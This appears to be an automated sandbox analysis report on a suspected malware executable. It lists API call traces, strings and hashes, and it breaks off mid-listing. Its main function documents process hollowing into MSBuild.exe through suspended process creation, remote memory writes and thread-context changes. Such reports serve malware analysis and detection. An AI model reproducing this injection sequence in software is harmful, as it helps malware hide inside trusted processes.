Commandline:	"C:\Users\user\Desktop\nayfObR.exe"
Imagebase:	0x5a0000
File size:	535'040 bytes
MD5 hash:	138FCF999A87419BE2C7E5E036601466
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 005D019E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,005D0110,005D0100), ref: 005D0334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 005D0347
Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 005D0365
ReadProcessMemory.KERNELBASE(00000094,?,005D0154,00000004,00000000), ref: 005D0389
VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 005D03B4
WriteProcessMemory.KERNELBASE(00000094,00000000,?,?,00000000,?), ref: 005D040C
WriteProcessMemory.KERNELBASE(00000094,00400000,?,?,00000000,?,00000028), ref: 005D0457
WriteProcessMemory.KERNELBASE(00000094,?,?,00000004,00000000), ref: 005D0495
Wow64SetThreadContext.KERNEL32(00000098,039E0000), ref: 005D04D1
ResumeThread.KERNELBASE(00000098), ref: 005D04E0

Strings

ResumeThread, xrefs: 005D02D8
CreateProcessW, xrefs: 005D0250
GetThreadContext, xrefs: 005D0276
TerminateProcess, xrefs: 005D03C3
ress, xrefs: 005D0226
ReadProcessMemory, xrefs: 005D0289
Load, xrefs: 005D01DA
VirtualAlloc, xrefs: 005D0263
SetThreadContext, xrefs: 005D02C2
GetP, xrefs: 005D021E
WriteProcessMemory, xrefs: 005D02AF
VirtualAllocEx, xrefs: 005D029C
aryA, xrefs: 005D01E2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 005D0333

Memory Dump Source

Source File: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: 10bbca99a9e39ac1c95ba2eb8e2fd0ba82f6786416c39638528e60b949801759
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 8DB1067660168AAFDB60CF6CCC80BDA77A5FF88714F158525EA08AB341D770FA41CB94

Function 005A1CF0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 005A1D1B
CreateFileA.KERNELBASE ref: 005A1D74
GetFileSize.KERNEL32 ref: 005A1DA3
CloseHandle.KERNEL32 ref: 005A1DBF

Strings

CreateFileA, xrefs: 005A1D0E

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: File$AddressCloseCreateHandleProcSize
String ID: CreateFileA
API String ID: 2547132502-1429953656
Opcode ID: 1681f709b51a05f6f0a2de2726b078c5f5881168f9a7cfc67cb8992ea0f873bd
Instruction ID: e26128fcc16fb39864df3f2d42ed28a0664897acb19872b36cec4cf629f45699
Opcode Fuzzy Hash: 1681f709b51a05f6f0a2de2726b078c5f5881168f9a7cfc67cb8992ea0f873bd
Instruction Fuzzy Hash: 6441C3B0D086499FCB00EFA8D4996AEBFF0BF49314F008929E899A7350D7749548DF96

Function 005A2350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 005A2376
GetProcAddress.KERNEL32 ref: 005A238E
FreeConsole.KERNELBASE ref: 005A239D
CreateThread.KERNELBASE ref: 005A23DB
WaitForSingleObject.KERNEL32 ref: 005A23F5
CloseHandle.KERNEL32 ref: 005A2404

Strings

kernel32.dll, xrefs: 005A236D
FreeConsole, xrefs: 005A2381

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: Handle$AddressCloseConsoleCreateFreeModuleObjectProcSingleThreadWait
String ID: FreeConsole$kernel32.dll
API String ID: 1818784962-2564406000
Opcode ID: d51343227a9c35e26b85539b3b1d7d16e2c74d9c0cc340b56cfd217483260b84
Instruction ID: 22418aa48872a44d42e8af74aef07f8e4a44e0b0c68a2eca710b91aaa560420f
Opcode Fuzzy Hash: d51343227a9c35e26b85539b3b1d7d16e2c74d9c0cc340b56cfd217483260b84
Instruction Fuzzy Hash: A621A8B09046099FCB40EFB8D94979EBBF0FB44304F00892EE855D7250EB749648DB82

Function 005B5F42 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,005B6051,00000000,00000000,00000000,?,?,?,005B5CCF,00000022,FlsSetValue,005C8AF8,005C8B00,?), ref: 005B6003

Strings

ext-ms-, xrefs: 005B5FAD
api-ms-, xrefs: 005B5F99

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 348ba05df28931c2218ab2b228332845534098102d9bfd655ee7996ffe7725b1
Instruction ID: e6ae34e3b3e99607cd64156593aa52c4a435ff7717e3aaa71c929e793fb71fd9
Opcode Fuzzy Hash: 348ba05df28931c2218ab2b228332845534098102d9bfd655ee7996ffe7725b1
Instruction Fuzzy Hash: 112105B2A02A14ABC7369B249C45FAA7F59FB513A0F250121FE15A7280F730FD04D6D0

Function 005B672A Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 005B67AF
__alloca_probe_16.LIBCMT ref: 005B6878
__freea.LIBCMT ref: 005B68DF

Part of subcall function 005B4FF1: RtlAllocateHeap.NTDLL(00000000,005B6F75,?,?,005B6F75,00000220,?,?,?), ref: 005B5023

__freea.LIBCMT ref: 005B68F2
__freea.LIBCMT ref: 005B68FF

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: f9ac1f9ecfaa16f539fe7e042ddb3bd85bf33a862b6a6e66d94481d9e0ee5e42
Instruction ID: 2cbe3a7ed44261ede45bee5f8ab337c58c38c72fc839f46dccda6108690d8df2
Opcode Fuzzy Hash: f9ac1f9ecfaa16f539fe7e042ddb3bd85bf33a862b6a6e66d94481d9e0ee5e42
Instruction Fuzzy Hash: C251BF72600647AFEB259E64CC89EFB3EE9FF85710F150439FD04D6152EA39ED1096A0

Function 005A2050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 005A210E
VirtualProtect.KERNELBASE ref: 005A2163

Strings

@, xrefs: 005A2157
VirtualProtect, xrefs: 005A2101

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: AddressProcProtectVirtual
String ID: @$VirtualProtect
API String ID: 3759838892-29487290
Opcode ID: 371984dadc5e790e9cb3aee65585b59620b190226eeaaa2833b59c0d2b9ab01c
Instruction ID: e4a67fd3cc2d756b6335f8e3fde75938e12dc1fee7d9a710a6037f4afec099bc
Opcode Fuzzy Hash: 371984dadc5e790e9cb3aee65585b59620b190226eeaaa2833b59c0d2b9ab01c
Instruction Fuzzy Hash: 6941E4B0901209DFCB04DFA8D99969EBFF0FF48314F10842AE848AB390D7759988CF85

Function 005AEE63 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,005AEF25,00000000,?,?,pZ,9BCBA9B0,?,005AED70), ref: 005AEE74
TerminateProcess.KERNEL32(00000000,?,005AEF25,00000000,?,?,pZ,9BCBA9B0,?,005AED70), ref: 005AEE7B
ExitProcess.KERNEL32 ref: 005AEE8D

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dd10d0371573e4d3c29be7b64362bf3bf687d8b0f07138d649d4cf82160d9f37
Instruction ID: 55597049db2c9627dfdd0e9245dedb79543bd602e3674e7b424a389da59417f7
Opcode Fuzzy Hash: dd10d0371573e4d3c29be7b64362bf3bf687d8b0f07138d649d4cf82160d9f37
Instruction Fuzzy Hash: CCD09231000649AFCF813F60EC0FC5D3F6EBF95391B444010BA095A032DB32A996AA80

Function 005BCCA4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005BD04E: GetConsoleOutputCP.KERNEL32(9BCBA9B0,00000000,00000000,?), ref: 005BD0B1

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,005AD402,?,005AD664), ref: 005BCE29
GetLastError.KERNEL32(?,005AD402,?,005AD664,?,005AD664,?,?,?,?,?,?,?,?,?,?), ref: 005BCE33

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 3ce4957283c39b5fb1f87022a003a89d5e0da90c346806c27ab85894dccb4079
Instruction ID: 7ef3e2f92304fd2f7b21ec6829506b18def37606019cda570ea642a792fa1b1e
Opcode Fuzzy Hash: 3ce4957283c39b5fb1f87022a003a89d5e0da90c346806c27ab85894dccb4079
Instruction Fuzzy Hash: 1461B1B5D0015AAFDF12CFA8C884AFEBFB9BF59304F140555E814AB252D371E905CBA4

Function 005B6BA8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005B6DAD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 005B6DD8

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,005B6FB8,?,00000000,?,?,?), ref: 005B6C09
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,005B6FB8,?,00000000,?,?,?), ref: 005B6C45

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 34cb681ced8687bcafb7dc70c088343ea9f5227550f49463ba4a2e28968325b8
Instruction ID: 5050c5d5fd9e93d41b42c941a6209a1f5b8a893394a91e657b895a796a542037
Opcode Fuzzy Hash: 34cb681ced8687bcafb7dc70c088343ea9f5227550f49463ba4a2e28968325b8
Instruction Fuzzy Hash: B8512174A006499EDB20CF75C8956EBBFF5FF85300F18846FD0868B292D678B945CB90

Function 005BD47D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,005BCE0F,?,005AD664,?,?,?,00000000), ref: 005BD519
GetLastError.KERNEL32(?,005BCE0F,?,005AD664,?,?,?,00000000,?,?,?,?,?,005AD402,?,005AD664), ref: 005BD53F

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 75a41700bcff658e57f85686b9395d44d1a3a513cfbd95b270a1179963fd9664
Instruction ID: 5c2784771375f0a31d9f5d5cf56aade7f390b822900570fc95cfd6f4ca75afb6
Opcode Fuzzy Hash: 75a41700bcff658e57f85686b9395d44d1a3a513cfbd95b270a1179963fd9664
Instruction Fuzzy Hash: 1D219135A002199FCF25CF29DC80AEDBBB9FB98315F1440AAE906D7251E630ED46CF65

Function 005B6A92 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,005B6981,005CFD98,0000000C), ref: 005B6ADE
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,005B6981,005CFD98,0000000C), ref: 005B6AF0

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 434743182c1e3615376eaff03084b8a28bebd21e99df6a7131322d13394c47e5
Instruction ID: 3b27990a62b6a24e3c78def570484142cfb3109eef85beade57fc765f92188f3
Opcode Fuzzy Hash: 434743182c1e3615376eaff03084b8a28bebd21e99df6a7131322d13394c47e5
Instruction Fuzzy Hash: E711E632204B518ECB348F3E8C886A2BEA5B756330B38071ED1B6D75F1D638F886D601

Function 005B5DF3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,005B681A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 005B5E27
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,005B681A,?,?,-00000008,?,00000000), ref: 005B5E45

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 8a9e0c8f85ebd6d573d8a4d4c03083d743a909898214583adbee0a6e97641817
Instruction ID: afca6d6e688ae32545e7d2e4e5f99d4ae0ea1fcc0f6221bd29d6e00b6a381fa3
Opcode Fuzzy Hash: 8a9e0c8f85ebd6d573d8a4d4c03083d743a909898214583adbee0a6e97641817
Instruction Fuzzy Hash: 21F07A3200051ABBCF126F90DC05EDE3F2AFF58760F058510FA1829020C736D971AB90

Function 005A22B0 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 005A22D8
GetModuleFileNameA.KERNEL32 ref: 005A22F8

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: Module$FileHandleName
String ID:
API String ID: 4146042529-0
Opcode ID: bd9e80c68f2284aa5e40aadb315aea867a60b3d334d02b75b6743b0a8c2be14d
Instruction ID: 507ac7a91ff230e3c2cbc7ec39e6a8ae88eb1c02612d5d3373d83e16333c477e
Opcode Fuzzy Hash: bd9e80c68f2284aa5e40aadb315aea867a60b3d334d02b75b6743b0a8c2be14d
Instruction Fuzzy Hash: 6901FF709152098FC754EF78E84569DBBF4FB54300F40446ED4C9D3240EB745588DF82

Function 005A1310 Relevance: 1.8, APIs: 1, Instructions: 308COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 005A135B

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 4c3cd1c08a2589ca5bc440b2ae198aeb1f1823e55f85f5354f2ae7330525f399
Instruction ID: 4a8e9cde50370c48bfe46e01886718863d00d586399816222372aa07c0253452
Opcode Fuzzy Hash: 4c3cd1c08a2589ca5bc440b2ae198aeb1f1823e55f85f5354f2ae7330525f399
Instruction Fuzzy Hash: CED10374604B418FC724DF38C199A6ABBE0BF8A714F148A1DE8978BBA1D734F844CB55

Function 005B7137 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000083,?,00000005,005B6FB8,?), ref: 005B7169

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: a22cf60f5570a0136379c0d693565d188be7446b9b2c985d56553f1f2f6a23ec
Instruction ID: 82f9ace18620b350c7a6374898d1b64488c757870991f3945f228c2ac83ec676
Opcode Fuzzy Hash: a22cf60f5570a0136379c0d693565d188be7446b9b2c985d56553f1f2f6a23ec
Instruction Fuzzy Hash: 795149B590C15CAEDB118A68CD84BE9BFBDFB99300F1401E9E499C7182D335BD85DBA0

Function 005A8100 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true

Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8df40b49336e4fffccab0ed2b9c025363f1dc2c649d391d1ba9bacf93bfb11f
